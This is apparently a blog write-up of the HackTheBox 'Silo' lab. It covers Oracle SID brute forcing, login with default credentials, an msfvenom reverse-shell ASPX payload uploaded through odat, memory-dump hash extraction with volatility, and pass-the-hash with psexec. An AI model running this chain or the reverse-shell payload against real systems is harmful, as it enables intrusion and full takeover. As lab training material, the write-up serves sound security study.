Silo Write up

Posted Dec 20, 2023 Updated Jan 6, 2024

By thehunt1s0n 4 min read

Welcome to my Silo Write-up

Recon

Nmap

$ sudo nmap -p- -Pn -sS 10.10.10.82

Nmap scan report for 10.10.10.82 (10.10.10.82)
Host is up (0.069s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1521/tcp  open  oracle
5985/tcp  open  wsman
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown
49161/tcp open  unknown
49162/tcp open  unknown

$ sudo nmap -sSVC -A -oA nmap/silo 10.10.10.82

Nmap scan report for 10.10.10.82 (10.10.10.82)
Host is up (0.056s latency).
Not shown: 988 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=7/5%OT=80%CT=1%CU=40842%PV=Y%DS=2%DC=T%G=Y%TM=64A5BCD9
...

Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-07-05T18:56:13
|_  start_date: 2023-07-05T18:53:23
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   302: 
|_    Message signing enabled but not required
|_clock-skew: mean: -5s, deviation: 0s, median: -5s

SMB

Nothing here.

PORT 80

$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.82/FUZZ

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v2.0.0-dev
________________________________________________

:: Method           : GET
:: URL              : http://10.10.10.82/FUZZ
:: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration      : false
:: Timeout          : 10
:: Threads          : 40
:: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 701, Words: 27, Lines: 32, Duration: 63ms]
    * FUZZ: 

[Status: 301, Size: 156, Words: 9, Lines: 2, Duration: 57ms]
    * FUZZ: aspnet_client

Nothing interesting here.

PORT 1521 (ORACLE)

https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener

SID ENUMERATION

What is a SID? The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID. In some old versions (in 9 it works) you could ask for the SID and the database send it to you:

$ tnscmd10g status-p 1521 -h 10.10.10.82

If you cant access this way to the SIDs you will need to bruteforce them:

$ hydra -L sids-oracle.txt -s 1521 10.10.10.82 oracle-sid

make sure you have odat installed, here is the link.

$ ./odat-linux-libc2.17-x86_64 all -s 10.10.10.82 -p 1521

Running the command I found valid credentials:

SID: XE

USERNAME: scott

PASSWORD: tiger

First we need to install Oracle in kali.

$ sqlplus scott/tiger@10.10.10.82:1521/XE 'as sysdba';

Let’s create a user and give him permissions.

SQL> create user taha identified by password;

SQL> grant sysdba to taha;

SQL> grant dba to taha;

Initial Foorhold (Arbitary file upload):

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f aspx > shell.aspx

Now we are going to use the account that we created to upload a shell.

$ odat dbmsxslprocessor -s 10.10.10.82 -d XE -U taha -P password --putFile "C:\inetpub\wwwroot" "shell.aspx" "/home/thehunt/Desktop/exploits/shell.aspx" --sysdba

Open http://10.10.10.92/shell.aspx

Privilege Escalation

In C:\Users\Phineas\Desktop I found:

Copy link https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0 and use the password £%Hm8646uC$ found

Let’s go into dropbox and download the file. I got a zip file. I extracted it and got a memory dump. Let’s analyse it using volatility (you can install it using this link : install). I ran this command to check the profile:

$ volatility -f SILO-20180105-221806.dmp imageinfo

I got a lot of suggestions. Running systeminfo on the remote machine gives us the OS name: Microsoft Windows Server 2012 R2 Standard. So, I’ll use the profile as: Win2012R2x64. First, let’s try hashdump and see if we can get the hash of Administrator:

$ volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump

# impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 Administrator@silo.htb

writeup

hackthebox

This post is licensed under CC BY 4.0 by the author.